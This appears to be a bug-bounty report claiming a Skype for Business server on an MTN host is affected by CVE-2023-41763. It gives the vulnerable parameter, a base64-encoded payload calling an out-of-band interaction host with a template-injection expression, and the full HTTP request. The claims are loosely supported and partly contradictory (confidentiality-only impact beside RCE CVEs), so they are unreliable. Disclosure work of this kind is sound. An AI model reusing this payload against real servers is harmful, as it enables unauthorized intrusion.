CVE-2023-41763 Business Elevation of Privilege vulnerability on [.mtn.com]

## Summary: The Microsoft Skype for Business installation on the remote host is missing security updates. the flaw was actively exploited. Attackers could access some sensitive information but not alter or restrict access to it. The impact relates primarily to confidentiality. It is, therefore, affected by multiple vulnerabilities: - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2023-41763) - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2023-36780, CVE-2023-36786, CVE-2023-36789) ## Steps To Reproduce: 1. Navigate visit https://fec-feweb-ext.mtn.com/lwa/Webpages/LwaClient.aspx 1. Intercept request to burp-suite and send to repeater 1. Added `parameter-vulnerable` is `lwa/Webpages/LwaClient.aspx?meeturl=` I found this use recon 1. Used `base64` encode to add payloads `template-injection` `LMN%{1337*1337}#.xx` ``` http://attacker-payload-interact.sh/?id=LMN%{1337*1337}#.xx// ``` 1. Sent request again, and boom **This server has vulnerable:** Here's the HTTP Parameter request that the issue: ``` GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2NtZDRjdm5laTU2Z3U5ZXRnMjIwb3AxaGI3ZWV3eDZjdS5vYXN0LmZ1bi8/aWQ9TE1OJTI1ezEzMzcqMTMzN30jLnh4Ly8= HTTP/1.1 Host: fec-feweb-ext.mtn.com Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "" Upgrade-Insecure-Requests: 1 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ``` ``` HTTP/1.1 200 OK Cache-Control: private ``` ## Supporting Material/References: Microsoft has released KB5032429 to address this issue. {F2970073} {F2970077} ## Impact The Elevation of Privilege vulnerability, CVE-2023-41763, posed a significant security risk because it allowed attackers to potentially breach internet perimeters by exploiting Skype for Business. While the vulnerability primarily affected confidentiality, it could have led to the exposure of sensitive information that in turn might provide access to internal networks.